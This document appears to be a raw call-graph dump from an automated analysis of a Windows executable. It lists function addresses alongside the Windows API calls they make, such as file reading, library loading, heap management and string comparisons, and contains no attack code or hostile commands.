48803->48807 48805 912ec2 48805->48796 48805->48800 48806->48796 48808 911d53 48807->48808 48810 911d5e 48807->48810 48813 9137f3 48808->48813 48811 911d64 48810->48811 48817 911c76 48810->48817 48811->48805 48814 9137ff 48813->48814 48816 91380b 48813->48816 48827 91593a GetProcessHeap HeapSize 48814->48827 48816->48810 48818 911cae 48817->48818 48826 911c88 48817->48826 48819 911d01 48818->48819 48820 911cb9 48818->48820 48830 91540b GetProcessHeap RtlAllocateHeap 48819->48830 48821 911cc0 48820->48821 48822 911cf6 48820->48822 48828 915810 50 API calls _memcpy_s 48821->48828 48829 9156c2 GetProcessHeap RtlReAllocateHeap 48822->48829 48826->48811 48827->48816 48828->48826 
48829->48826 48830->48826 48831->48768 48843 9113da 48832->48843 48834 911844 48835 9118ab 48834->48835 48836 91184c LoadLibraryExW 48834->48836 48849 9118c0 48835->48849 48838 911866 GetLastError 48836->48838 48839 911872 48836->48839 48838->48839 48839->48778 48841 911c76 52 API calls 48840->48841 48842 9129d8 48841->48842 48842->48776 48844 9113e7 GetModuleHandleW 48843->48844 48845 91146b 48843->48845 48846 9113f9 GetLastError 48844->48846 48847 91143e GetProcAddress GetProcAddress 48844->48847 48845->48834 48848 911405 48846->48848 48847->48845 48848->48834 48859 9148c2 48849->48859 48851 9118d8 48855 9118de 48851->48855 48875 912acf 48851->48875 48854 911937 LoadLibraryExW 48854->48855 48857 91194c GetLastError 48854->48857 48856 9119a7 48855->48856 48878 91367f GetProcessHeap RtlFreeHeap GetLastError 48855->48878 48856->48839 48857->48855 48860 914951 48859->48860 48861 9148d6 48859->48861 48862 9129c8 52 API calls 48860->48862 48863 9137f3 2 API calls 48861->48863 48864 9148e1 48862->48864 48863->48864 48865 914901 GetSystemDirectoryW 48864->48865 48868 9148e7 48864->48868 48866 914910 GetLastError 48865->48866 48867 91497a 48865->48867 48866->48868 48870 9129c8 52 API calls 48867->48870 48873 9149e4 48867->48873 48868->48851 48869 913cfd 52 API calls 48869->48868 48871 914986 48870->48871 48871->48868 48872 91499d GetSystemDirectoryW 48871->48872 48872->48873 48874 9149aa GetLastError 48872->48874 48873->48868 48873->48869 48874->48868 48879 912ae3 48875->48879 48878->48856 48882 911ae9 48879->48882 48881 911910 48881->48854 48881->48855 48883 911b02 48882->48883 48884 911b0c 48882->48884 48893 91593a GetProcessHeap HeapSize 48883->48893 48885 911c76 52 API calls 48884->48885 48888 911b12 48884->48888 48890 911b87 48884->48890 48885->48890 48888->48881 48889 911c76 52 API calls 48889->48890 48890->48888 48890->48889 48891 911bfd 48890->48891 48894 9126b9 45 API calls __vsnwprintf_l 48890->48894 48891->48888 48891->48891 48895 91367f GetProcessHeap 
RtlFreeHeap GetLastError 48891->48895 48893->48884 48894->48890 48895->48888 48896->48570 48897->48572 48898->48573 48899->48576 48900->48579 48901->48580 48902->48582 48904 96b08a 48903->48904 48905 917f80 48904->48905 48907 96a747 FormatMessageW 48904->48907 48905->48587 48908 96a772 GetLastError 48907->48908 48909 96a77e 48907->48909 48908->48909 48910 96a78b 48909->48910 48914 96a805 48909->48914 48912 96a7f5 LocalFree 48910->48912 48913 96a7fe 48910->48913 48912->48913 48913->48905 48915 96a82e EnterCriticalSection 48914->48915 48916 96a9ed 48914->48916 48918 96a935 48915->48918 48919 96a842 GetCurrentProcessId GetCurrentThreadId GetLocalTime 48915->48919 48917 9567e6 _ValidateLocalCookies 5 API calls 48916->48917 48920 96a9fb 48917->48920 48934 91327c 48918->48934 48923 96a87f 48919->48923 48920->48910 48922 96a94f 48931 96a923 48922->48931 48949 96b3f2 EnterCriticalSection 48922->48949 48924 912acf 56 API calls 48923->48924 48926 96a90a 48924->48926 48926->48918 48927 96a914 48926->48927 48927->48931 48928 96a9c6 LeaveCriticalSection 48929 96a9d7 48928->48929 48930 96a9df 48928->48930 48952 91367f GetProcessHeap RtlFreeHeap GetLastError 48929->48952 48930->48916 48953 91367f GetProcessHeap RtlFreeHeap GetLastError 48930->48953 48931->48928 48935 913296 48934->48935 48936 9132a1 48934->48936 48954 913840 GetProcessHeap HeapSize 48935->48954 48937 9132ce WideCharToMultiByte 48936->48937 48940 9132a7 48936->48940 48942 913333 48936->48942 48939 9132e7 GetLastError 48937->48939 48937->48942 48939->48940 48940->48922 48941 913387 48941->48940 48943 9133d4 WideCharToMultiByte 48941->48943 48942->48940 48942->48941 48944 913380 48942->48944 48945 913389 48942->48945 48943->48940 48946 9133f0 GetLastError 48943->48946 48955 9156c2 GetProcessHeap RtlReAllocateHeap 48944->48955 48956 91540b GetProcessHeap RtlAllocateHeap 48945->48956 48946->48940 48957 96aabf 48949->48957 48951 96b40b LeaveCriticalSection 48951->48931 48952->48930 48953->48916 48954->48936 
48955->48941 48956->48941 48958 96aae2 48957->48958 48959 96ab1e 48958->48959 48962 96ab4b 48958->48962 48964 96aae8 48958->48964 48965 913145 6 API calls 48959->48965 48960 96ab50 WriteFile 48960->48962 48963 96ab6b GetLastError 48960->48963 48962->48960 48962->48964 48963->48962 48964->48951 48965->48964 48978 969a4d 48966->48978 48968 96a069 48968->48594 48969->48597 48970->48602 48972 91176a 48971->48972 48974 911763 48971->48974 48973 911795 GetLastError 48972->48973 48972->48974 48973->48974 48974->48604 48976 9155e4 GetLastError 48975->48976 48977 9155f0 48975->48977 48976->48977 48977->48599 48979 969ad0 48978->48979 48980 969a69 48978->48980 48988 91540b GetProcessHeap RtlAllocateHeap 48979->48988 48986 91593a GetProcessHeap HeapSize 48980->48986 48983 969a74 48985 969a7a 48983->48985 48987 9156c2 GetProcessHeap RtlReAllocateHeap 48983->48987 48985->48968 48986->48983 48987->48985 48988->48985 48990 92ba05 48989->48990 48991 92b9f9 CloseHandle 48989->48991 48992 92ba16 48990->48992 48993 92ba0a CloseHandle 48990->48993 48991->48990 48994 92ba27 48992->48994 48995 92ba1b CloseHandle 48992->48995 48993->48992 48996 92ba3a 48994->48996 48997 92ba2d CloseHandle 48994->48997 48995->48994 48998 92ba48 48996->48998 49175 91367f GetProcessHeap RtlFreeHeap GetLastError 48996->49175 48997->48996 49000 92ba54 48998->49000 49176 91367f GetProcessHeap RtlFreeHeap GetLastError 48998->49176 49000->48629 49003 91783d DeleteCriticalSection 49002->49003 49006 920598 49002->49006 49008 925739 49003->49008 49004 9205bf 49005 9155c9 3 API calls 49004->49005 49005->49003 49006->49004 49177 91367f GetProcessHeap RtlFreeHeap GetLastError 49006->49177 49009 925746 49008->49009 49010 92574e 49008->49010 49178 91367f GetProcessHeap RtlFreeHeap GetLastError 49009->49178 49012 92003c 3 API calls 49010->49012 49013 925754 _memcpy_s 49012->49013 49013->48639 49015 917862 49014->49015 49016 91e965 49014->49016 49020 931a5b 49015->49020 49018 91367f GetProcessHeap RtlFreeHeap GetLastError 
49016->49018 49019 91e9ab 49016->49019 49017 9155c9 3 API calls 49017->49015 49018->49016 49019->49017 49021 91786e 49020->49021 49022 931a67 49020->49022 49024 926e65 49021->49024 49179 97542a GetProcessHeap RtlFreeHeap GetLastError 49022->49179 49180 925d86 49024->49180 49027 926e83 _memcpy_s 49027->48645 49030 917886 49029->49030 49033 91c086 49029->49033 49036 9227a8 49030->49036 49031 91c0bc 49032 9155c9 3 API calls 49031->49032 49032->49030 49033->49031 49255 91367f GetProcessHeap RtlFreeHeap GetLastError 49033->49255 49256 93dcae GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 49033->49256 49037 917892 49036->49037 49039 9227bb 49036->49039 49042 929cf3 49037->49042 49038 9155c9 3 API calls 49038->49037 49040 922877 49039->49040 49041 91367f GetProcessHeap RtlFreeHeap GetLastError 49039->49041 49040->49038 49041->49039 49043 929d02 49042->49043 49044 929d0a 49042->49044 49267 91367f GetProcessHeap RtlFreeHeap GetLastError 49043->49267 49046 929d18 49044->49046 49268 91367f GetProcessHeap RtlFreeHeap GetLastError 49044->49268 49048 929d37 49046->49048 49269 91367f GetProcessHeap RtlFreeHeap GetLastError 49046->49269 49049 929d44 49048->49049 49051 9155c9 3 API calls 49048->49051 49052 929d61 49049->49052 49270 91367f GetProcessHeap RtlFreeHeap GetLastError 49049->49270 49051->49049 49053 929d6e 49052->49053 49055 9155c9 3 API calls 49052->49055 49056 929d8b 49053->49056 49271 91367f GetProcessHeap RtlFreeHeap GetLastError 49053->49271 49055->49053 49057 929d98 49056->49057 49059 9155c9 3 API calls 49056->49059 49060 929db5 49057->49060 49272 91367f GetProcessHeap RtlFreeHeap GetLastError 49057->49272 49059->49057 49061 929dc2 49060->49061 49063 9155c9 3 API calls 49060->49063 49064 929dcf 49061->49064 49273 91367f GetProcessHeap RtlFreeHeap GetLastError 49061->49273 49063->49061 49066 929ddc 49064->49066 49274 91367f GetProcessHeap RtlFreeHeap GetLastError 49064->49274 49068 929de9 49066->49068 49275 91367f GetProcessHeap RtlFreeHeap 
GetLastError 49066->49275 49070 929df6 49068->49070 49276 91367f GetProcessHeap RtlFreeHeap GetLastError 49068->49276 49072 929e03 49070->49072 49277 91367f GetProcessHeap RtlFreeHeap GetLastError 49070->49277 49074 929e10 49072->49074 49278 91367f GetProcessHeap RtlFreeHeap GetLastError 49072->49278 49076 929e1d 49074->49076 49279 91367f GetProcessHeap RtlFreeHeap GetLastError 49074->49279 49078 929e2a 49076->49078 49280 91367f GetProcessHeap RtlFreeHeap GetLastError 49076->49280 49080 929e37 49078->49080 49281 91367f GetProcessHeap RtlFreeHeap GetLastError 49078->49281 49081 929e44 49080->49081 49282 91367f GetProcessHeap RtlFreeHeap GetLastError 49080->49282 49084 929e51 49081->49084 49283 91367f GetProcessHeap RtlFreeHeap GetLastError 49081->49283 49086 929e5e 49084->49086 49284 91367f GetProcessHeap RtlFreeHeap GetLastError 49084->49284 49088 929e6b 49086->49088 49285 91367f GetProcessHeap RtlFreeHeap GetLastError 49086->49285 49090 929e78 49088->49090 49286 91367f GetProcessHeap RtlFreeHeap GetLastError 49088->49286 49091 929e85 49090->49091 49287 91367f GetProcessHeap RtlFreeHeap GetLastError 49090->49287 49094 929e95 49091->49094 49288 91367f GetProcessHeap RtlFreeHeap GetLastError 49091->49288 49096 929ea5 49094->49096 49289 91367f GetProcessHeap RtlFreeHeap GetLastError 49094->49289 49098 929eb5 49096->49098 49290 91367f GetProcessHeap RtlFreeHeap GetLastError 49096->49290 49100 929ec5 49098->49100 49291 91367f GetProcessHeap RtlFreeHeap GetLastError 49098->49291 49102 929ed5 49100->49102 49292 91367f GetProcessHeap RtlFreeHeap GetLastError 49100->49292 49104 929ee5 49102->49104 49293 91367f GetProcessHeap RtlFreeHeap GetLastError 49102->49293 49116 929ef5 49104->49116 49294 91367f GetProcessHeap RtlFreeHeap GetLastError 49104->49294 49107 929f76 49108 929f88 49107->49108 49295 91367f GetProcessHeap RtlFreeHeap GetLastError 49107->49295 49111 929f98 49108->49111 49296 91367f GetProcessHeap RtlFreeHeap GetLastError 49108->49296 49109 929f6e 49112 9155c9 3 
API calls 49109->49112 49257 94022a 49111->49257 49112->49107 49116->49107 49116->49109 49118 91367f GetProcessHeap RtlFreeHeap GetLastError 49116->49118 49117 929fba _memcpy_s 49117->48651 49118->49116 49121 920070 49120->49121 49122 920049 49120->49122 49123 9178aa 49121->49123 49301 974b0d GetProcessHeap RtlFreeHeap GetLastError 49121->49301 49127 920067 49122->49127 49300 91f6ce GetProcessHeap RtlFreeHeap GetLastError 49122->49300 49128 926ce3 49123->49128 49124 9155c9 3 API calls 49124->49121 49127->49124 49134 926d4d 49128->49134 49145 926cf5 49128->49145 49129 926d45 49131 9155c9 3 API calls 49129->49131 49130 926dab 49135 926db9 49130->49135 49140 9155c9 3 API calls 49130->49140 49131->49134 49132 926d72 49136 9155c9 3 API calls 49132->49136 49133 926da3 49138 9155c9 3 API calls 49133->49138 49134->49132 49137 926d7d 49134->49137 49139 925d86 3 API calls 49134->49139 49141 9178b6 49135->49141 49143 9155c9 3 API calls 49135->49143 49136->49137 49137->49130 49137->49133 49302 91367f GetProcessHeap RtlFreeHeap GetLastError 49137->49302 49138->49130 49139->49134 49140->49135 49146 91e406 49141->49146 49142 91367f GetProcessHeap RtlFreeHeap GetLastError 49142->49145 49143->49141 49145->49129 49145->49142 49147 91e413 49146->49147 49148 91e41b _memcpy_s 49146->49148 49149 9155c9 3 API calls 49147->49149 49148->48657 49149->49148 49151 9178cb 49150->49151 49153 91f404 49150->49153 49151->48660 49160 91367f GetProcessHeap RtlFreeHeap GetLastError 49151->49160 49152 9155c9 3 API calls 49152->49151 49154 91367f GetProcessHeap RtlFreeHeap GetLastError 49153->49154 49155 9155c9 3 API calls 49153->49155 49156 91f4c5 49153->49156 49303 974b0d GetProcessHeap RtlFreeHeap GetLastError 49153->49303 49154->49153 49155->49153 49156->49152 49158->48613 49159->48632 49160->48660 49161->48662 49162->48664 49163->48666 49164->48669 49165->48670 49166->48672 49167->48674 49168->48676 49169->48678 49170->48680 49171->48682 49172->48684 49173->48686 49174->48688 49175->48998 
49176->49000 49177->49006 49178->49010 49179->49021 49181 925d92 49180->49181 49182 925d99 49180->49182 49235 91367f GetProcessHeap RtlFreeHeap GetLastError 49181->49235 49183 925da7 49182->49183 49236 91367f GetProcessHeap RtlFreeHeap GetLastError 49182->49236 49186 925db5 49183->49186 49237 91367f GetProcessHeap RtlFreeHeap GetLastError 49183->49237 49188 925dc3 49186->49188 49238 91367f GetProcessHeap RtlFreeHeap GetLastError 49186->49238 49190 925dd1 49188->49190 49239 91367f GetProcessHeap RtlFreeHeap GetLastError 49188->49239 49192 925ddf 49190->49192 49240 91367f GetProcessHeap RtlFreeHeap GetLastError 49190->49240 49194 925ded 49192->49194 49241 91367f GetProcessHeap RtlFreeHeap GetLastError 49192->49241 49205 925e2c 49194->49205 49213 925e1f 49194->49213 49242 931a7d GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49194->49242 49196 925e3d 49199 925e48 49196->49199 49200 925e7c 49196->49200 49197 9155c9 3 API calls 49197->49205 49198 9155c9 3 API calls 49198->49196 49201 925e74 49199->49201 49202 925e4d 49199->49202 49247 941292 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49200->49247 49246 9430b4 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49201->49246 49206 925e52 49202->49206 49207 925e6c 49202->49207 49205->49196 49205->49198 49210 925e57 49206->49210 49211 925e64 49206->49211 49245 946705 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49207->49245 49208 925e62 49219 925e93 49208->49219 49210->49208 49243 949e34 GetProcessHeap RtlFreeHeap GetLastError 49210->49243 49244 9491ab GetProcessHeap RtlFreeHeap GetLastError 49211->49244 49213->49197 49215 925e8e 49215->49027 49218 91367f GetProcessHeap RtlFreeHeap GetLastError 49215->49218 49218->49027 49220 925ea0 49219->49220 49221 925ea8 49219->49221 49248 91367f GetProcessHeap RtlFreeHeap GetLastError 49220->49248 49225 925eb6 49221->49225 49249 91367f GetProcessHeap RtlFreeHeap GetLastError 49221->49249 49224 925ec4 49226 925ed2 49224->49226 49251 91367f GetProcessHeap RtlFreeHeap 
GetLastError 49224->49251 49225->49224 49250 91367f GetProcessHeap RtlFreeHeap GetLastError 49225->49250 49229 925ee0 49226->49229 49252 91367f GetProcessHeap RtlFreeHeap GetLastError 49226->49252 49231 925f02 _memcpy_s 49229->49231 49232 925ef4 49229->49232 49253 91367f GetProcessHeap RtlFreeHeap GetLastError 49229->49253 49231->49215 49232->49231 49254 9715b5 GetProcessHeap RtlFreeHeap GetLastError 49232->49254 49235->49182 49236->49183 49237->49186 49238->49188 49239->49190 49240->49192 49241->49194 49242->49194 49243->49208 49244->49208 49245->49208 49246->49208 49247->49208 49248->49221 49249->49225 49250->49224 49251->49226 49252->49229 49253->49232 49254->49231 49255->49033 49256->49033 49258 9402c8 49257->49258 49265 94023e 49257->49265 49259 929fa4 49258->49259 49261 9155c9 3 API calls 49258->49261 49259->49117 49297 97542a GetProcessHeap RtlFreeHeap GetLastError 49259->49297 49260 9402bf 49262 9155c9 3 API calls 49260->49262 49261->49259 49262->49258 49263 925d86 3 API calls 49263->49265 49265->49260 49265->49263 49298 91f6ce GetProcessHeap RtlFreeHeap GetLastError 49265->49298 49299 91367f GetProcessHeap RtlFreeHeap GetLastError 49265->49299 49267->49044 49268->49046 49269->49046 49270->49049 49271->49053 49272->49057 49273->49064 49274->49066 49275->49068 49276->49070 49277->49072 49278->49074 49279->49076 49280->49078 49281->49080 49282->49081 49283->49084 49284->49086 49285->49088 49286->49090 49287->49091 49288->49094 49289->49096 49290->49098 49291->49100 49292->49102 49293->49104 49294->49116 49295->49108 49296->49111 49297->49117 49298->49265 49299->49265 49300->49122 49301->49123 49302->49137 49303->49153 49305 96ac62 49304->49305 49306 96ac3f 49304->49306 49308 96ac71 49305->49308 49318 91367f GetProcessHeap RtlFreeHeap GetLastError 49305->49318 49307 96ac4a 49306->49307 49317 96aed3 76 API calls 49306->49317 49307->49305 49310 96ac54 CloseHandle 49307->49310 49312 96ac87 49308->49312 49319 91367f GetProcessHeap RtlFreeHeap GetLastError 
49308->49319 49310->49305 49312->48694 49312->48695 49314->48696 49315->48698 49316->48700 49317->49307 49318->49308 49319->49312 49320->48716 50762 953582 SetThreadExecutionState 50763 97ad80 CompareStringOrdinal GetLastError 50764 95e18d 44 API calls ___free_lconv_mon 49604 97058b 49605 970599 CoInitialize 49604->49605 49607 9705ab 49604->49607 49605->49607 49606 9705df CLSIDFromProgID 49608 9705f4 CLSIDFromProgID 49606->49608 49609 9705af 49606->49609 49607->49606 49607->49609 49608->49609 49610 96a58b 49611 911839 68 API calls 49610->49611 49612 96a59c 49611->49612 49613 96a5a2 GetProcAddress GetProcAddress 49612->49613 49614 96a5d0 49612->49614 49613->49614 49615 96a5fb 49614->49615 49616 911839 68 API calls 49614->49616 49617 96a5f5 49616->49617 49617->49615 49618 96a619 GetProcAddress 49617->49618 49619 96a677 GetProcAddress 49618->49619 49620 96a638 49618->49620 49619->49615 49621 96a696 49619->49621 49620->49619 49622 96a63c GetLastError 49620->49622 49621->49615 49623 96a69a GetLastError 49621->49623 49624 96a648 49622->49624 49623->49624 49624->49615 50766 9165b0 66 API calls 50768 97c1b1 16 API calls ___delayLoadHelper2@8 50175 96f5a7 50176 9118c0 62 API calls 50175->50176 50177 96f5c3 50176->50177 50182 96f5c9 50177->50182 50200 973be0 50177->50200 50179 96f5fc GetProcAddress 50180 96f620 GetProcAddress 50179->50180 50181 96f61b 50179->50181 50183 96f644 GetProcAddress 50180->50183 50184 96f63f 50180->50184 50181->50180 50185 96f74e 50182->50185 50212 91367f GetProcessHeap RtlFreeHeap GetLastError 50182->50212 50186 96f663 50183->50186 50187 96f668 GetProcAddress 50183->50187 50184->50183 50186->50187 50189 96f687 50187->50189 50190 96f68c GetProcAddress 50187->50190 50189->50190 50191 96f6b0 GetProcAddress 50190->50191 50192 96f6ab 50190->50192 50193 96f6d4 GetProcAddress 50191->50193 50194 96f6cf 50191->50194 50192->50191 50195 96f6f3 50193->50195 50194->50193 50196 96f717 50195->50196 50197 96f701 GetProcAddress 50195->50197 50198 96f736 
50196->50198 50199 96f720 GetProcAddress 50196->50199 50197->50196 50198->50182 50199->50198 50201 973c03 50200->50201 50202 973c51 GlobalAlloc 50201->50202 50203 973c09 GetLastError 50201->50203 50205 973c89 50202->50205 50208 973c22 50202->50208 50204 973c15 50203->50204 50204->50202 50204->50208 50206 973ca4 50205->50206 50207 973c98 GetLastError 50205->50207 50209 973cf6 GetLastError 50206->50209 50211 973cb1 50206->50211 50207->50206 50208->50179 50209->50211 50210 973d45 GlobalFree 50210->50208 50211->50210 50212->50185 50773 9197a0 67 API calls 50774 93fba1 CompareStringW CompareStringOrdinal GetLastError 50775 9361a0 58 API calls 50776 9605a0 15 API calls 2 library calls 48374 93ddd0 48375 93ddf4 48374->48375 48376 93de12 48375->48376 48377 93de09 CloseHandle 48375->48377 48377->48376 50781 93e1d0 43 API calls _memcpy_s 50783 95a7da 54 API calls 3 library calls 50785 918dc0 6 API calls 48508 93ddc0 48511 91540b GetProcessHeap RtlAllocateHeap 48508->48511 48510 93ddcd 48511->48510 50788 939dc0 365 API calls 50790 929bc6 82 API calls 50791 9115c8 73 API calls 50794 9527c9 143 API calls 50795 9191f0 56 API calls 50796 919df0 79 API calls 49719 93dff0 49724 93eb41 49719->49724 49721 93e01f ReadFile 49722 93e037 GetLastError 49721->49722 49723 93e043 49721->49723 49722->49723 49725 93eb56 49724->49725 49726 93eb5c SetFilePointerEx 49725->49726 49728 93eb7f 49725->49728 49727 93eb73 GetLastError 49726->49727 49726->49728 49727->49728 49728->49721 50797 9171f5 80 API calls 50799 9569f3 14 API calls 50801 9319f9 78 API calls 50802 93f9e3 77 API calls 50803 9169e0 10 API calls 50804 9199e0 70 API calls 50805 9535e3 GetProcessHeap RtlFreeHeap GetLastError 50806 970fe0 74 API calls 50808 916be8 9 API calls 50809 95a1e8 52 API calls 4 library calls 48482 917b1f 192 API calls _ValidateLocalCookies 50813 91711f 378 API calls 50814 961503 44 API calls 2 library calls 50818 93fb05 65 API calls 50819 918f30 54 API calls _ValidateLocalCookies 50820 953337 277 API calls 50821 
93f530 131 API calls 49730 97c331 49731 97c33b 49730->49731 49732 97c6ef ___delayLoadHelper2@8 16 API calls 49731->49732 49733 97c348 49732->49733 50824 95a13b 41 API calls 4 library calls 50154 911121 CreateFileW 50165 9179d1 50154->50165 50158 91114d 50159 911190 CloseHandle 50158->50159 50160 911197 50158->50160 50159->50160 50162 9111a5 50160->50162 50171 91367f GetProcessHeap RtlFreeHeap GetLastError 50160->50171 50163 9567e6 _ValidateLocalCookies 5 API calls 50162->50163 50164 9111bb 50163->50164 50166 9179e7 lstrlenW 50165->50166 50167 9179fc 50165->50167 50166->50167 50168 911144 50167->50168 50169 917a15 CompareStringW 50167->50169 50170 911651 HeapSetInformation 50168->50170 50169->50168 50170->50158 50171->50162 50825 919720 17 API calls 50826 93d520 98 API calls 50827 932d27 81 API calls 50828 966320 51 API calls 50829 916750 72 API calls 50830 957150 51 API calls _unexpected 50831 959350 6 API calls 4 library calls 50833 962f50 FreeLibrary 50835 9290f5 9 API calls _ValidateLocalCookies 50837 916570 73 API calls 50838 918d70 6 API calls 50839 93f971 76 API calls 50841 93f170 117 API calls 49737 91677f InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 49738 9167e5 49737->49738 49739 9167f1 GetCurrentProcess 49738->49739 49748 96b796 OpenProcessToken 49739->49748 49743 91681e 49746 916824 49743->49746 49821 91db61 49743->49821 49749 96b7be GetLastError 49748->49749 49750 96b7f8 GetTokenInformation 49748->49750 49752 96b7ca 49749->49752 49751 96b820 GetLastError 49750->49751 49750->49752 49751->49752 49753 96b873 CloseHandle 49752->49753 49754 916804 49752->49754 49753->49754 49755 93469c 49754->49755 49789 934910 49755->49789 49808 9346d7 49755->49808 49756 9346fb CompareStringW 49757 93572b CompareStringW 49756->49757 49758 93471b CompareStringW 49756->49758 49757->49808 49758->49757 49760 93473e CompareStringW 49758->49760 49759 915573 6 API calls 49759->49808 49760->49757 49761 934761 CompareStringW 49760->49761 49762 934784 
CompareStringW 49761->49762 49761->49808 49763 9347a7 CompareStringW 49762->49763 49762->49808 49764 9347ca CompareStringW 49763->49764 49763->49808 49765 9347ed CompareStringW 49764->49765 49764->49808 49766 934810 CompareStringW 49765->49766 49765->49808 49767 934833 CompareStringW 49766->49767 49766->49808 49768 934856 CompareStringW 49767->49768 49767->49808 49769 934884 CompareStringW 49768->49769 49768->49808 49770 93495d CompareStringW 49769->49770 49769->49808 49771 93499a CompareStringW 49770->49771 49770->49808 49772 9349d8 CompareStringW 49771->49772 49771->49808 49773 934a16 CompareStringW 49772->49773 49772->49808 49774 934a54 CompareStringW 49773->49774 49773->49808 49775 934a77 CompareStringW 49774->49775 49774->49808 49777 934a9a CompareStringW 49775->49777 49775->49808 49776 91417b 60 API calls 49776->49808 49778 934ac5 CompareStringW 49777->49778 49777->49808 49779 934afb CompareStringW 49778->49779 49778->49808 49780 934b28 CompareStringW 49779->49780 49779->49808 49781 934b89 CompareStringW 49780->49781 49780->49808 49782 934bea CompareStringW 49781->49782 49781->49808 49783 934c3d CompareStringW 49782->49783 49782->49808 49784 934c90 lstrlenW CompareStringW 49783->49784 49783->49808 49785 934cba lstrlenW 49784->49785 49786 934d58 CompareStringW 49784->49786 49785->49808 49787 934e56 lstrlenW lstrlenW CompareStringW 49786->49787 49786->49808 49788 934f7a lstrlenW lstrlenW CompareStringW 49787->49788 49787->49808 49790 935010 CompareStringW 49788->49790 49791 934faa lstrlenW 49788->49791 49789->49743 49792 9350a6 CompareStringW 49790->49792 49790->49808 49791->49808 49793 9350e9 CompareStringW 49792->49793 49792->49808 49795 93510a CompareStringW 49793->49795 49793->49808 49794 934ef6 lstrlenW 49794->49808 49796 93512d CompareStringW 49795->49796 49795->49808 49798 935150 CompareStringW 49796->49798 49796->49808 49797 9329f3 52 API calls 49797->49808 49799 935173 CompareStringW 49798->49799 49798->49808 49801 935196 CompareStringW 49799->49801 
49799->49808 49800 918119 72 API calls 49800->49808 49802 9351bc CompareStringW 49801->49802 49801->49808 49803 9351e2 CompareStringW 49802->49803 49802->49808 49804 935210 CompareStringW 49803->49804 49803->49808 49805 93527b lstrlenW lstrlenW CompareStringW 49804->49805 49804->49808 49806 935320 lstrlenW lstrlenW CompareStringW 49805->49806 49807 9352ab lstrlenW 49805->49807 49809 935350 lstrlenW 49806->49809 49810 9353c8 lstrlenW lstrlenW CompareStringW 49806->49810 49807->49808 49808->49756 49808->49757 49808->49759 49808->49776 49808->49789 49808->49793 49808->49794 49808->49797 49808->49800 49808->49804 49808->49806 49808->49810 49817 912eaf 52 API calls 49808->49817 49819 93567a lstrlenW lstrlenW CompareStringW 49808->49819 49809->49808 49811 935463 lstrlenW lstrlenW CompareStringW 49810->49811 49812 9353f8 lstrlenW 49810->49812 49813 935522 lstrlenW lstrlenW CompareStringW 49811->49813 49814 935497 lstrlenW 49811->49814 49812->49808 49815 935552 lstrlenW 49813->49815 49816 9355cb lstrlenW lstrlenW CompareStringW 49813->49816 49820 9354b7 49814->49820 49815->49820 49818 9355fb lstrlenW 49816->49818 49816->49819 49817->49808 49818->49808 49819->49808 49820->49813 49820->49816 49822 91db9a _memcpy_s 49821->49822 49823 91dc18 SetFilePointerEx 49822->49823 49824 91dbd8 GetLastError 49822->49824 49826 91dc74 ReadFile 49823->49826 49827 91dc34 GetLastError 49823->49827 49852 91dbe4 49824->49852 49828 91dcce 49826->49828 49829 91dc8e GetLastError 49826->49829 49827->49852 49830 91dcea SetFilePointerEx 49828->49830 49828->49852 49829->49852 49831 91dd3e ReadFile 49830->49831 49832 91dcfe GetLastError 49830->49832 49833 91dd9b 49831->49833 49834 91dd5b GetLastError 49831->49834 49832->49852 49835 91ddb8 SetFilePointerEx 49833->49835 49833->49852 49834->49852 49837 91de1f ReadFile 49835->49837 49838 91dddf GetLastError 49835->49838 49836 9567e6 _ValidateLocalCookies 5 API calls 49839 916847 49836->49839 49840 91de7c ReadFile 49837->49840 49841 91de3c GetLastError 
49837->49841 49838->49852 49839->49746 49866 92f511 49839->49866 49842 91ded9 SetFilePointerEx 49840->49842 49843 91de99 GetLastError 49840->49843 49841->49852 49844 91df38 ReadFile 49842->49844 49845 91def8 GetLastError 49842->49845 49843->49852 49846 91dfbc GetLastError 49844->49846 49847 91df5c 49844->49847 49845->49852 49846->49852 49848 91e00e 49847->49848 49849 91df96 ReadFile 49847->49849 49847->49852 49858 91e0b2 49847->49858 49848->49852 49894 91540b GetProcessHeap RtlAllocateHeap 49848->49894 49849->49846 49849->49847 49851 91e054 49851->49852 49853 91e08f SetFilePointerEx 49851->49853 49852->49836 49854 91e0a6 GetLastError 49853->49854 49855 91e0ef ReadFile 49853->49855 49854->49858 49856 91e114 GetLastError 49855->49856 49860 91e14b 49855->49860 49857 91e120 49856->49857 49857->49858 49858->49852 49859 9155c9 3 API calls 49858->49859 49859->49852 49860->49857 49895 973b63 GetFileSizeEx GetLastError 49860->49895 49862 91e202 49896 91540b GetProcessHeap RtlAllocateHeap 49862->49896 49864 91e2aa _memcpy_s 49897 91d84a GetModuleHandleW GetLastError 49864->49897 49898 97267a 49866->49898 49869 913db5 52 API calls 49870 92f56f 49869->49870 49871 913cfd 52 API calls 49870->49871 49872 92f530 49870->49872 49874 92f597 49871->49874 49873 92f74b 49872->49873 49947 91367f GetProcessHeap RtlFreeHeap GetLastError 49872->49947 49873->49746 49874->49872 49908 97672f 49874->49908 49877 92f5ce 49877->49872 49878 92f636 49877->49878 49881 92f61b 49877->49881 49882 92f5fb 49877->49882 49879 912eaf 52 API calls 49878->49879 49880 92f601 49879->49880 49880->49872 49920 971ec9 49880->49920 49881->49878 49946 96acf6 72 API calls _ValidateLocalCookies 49881->49946 49884 913cfd 52 API calls 49882->49884 49884->49880 49887 97267a 72 API calls 49888 92f6a9 49887->49888 49888->49872 49889 913db5 52 API calls 49888->49889 49890 92f6d9 49889->49890 49890->49872 49891 913cfd 52 API calls 49890->49891 49892 92f6fe 49891->49892 49892->49872 49933 92cb06 49892->49933 49894->49851 
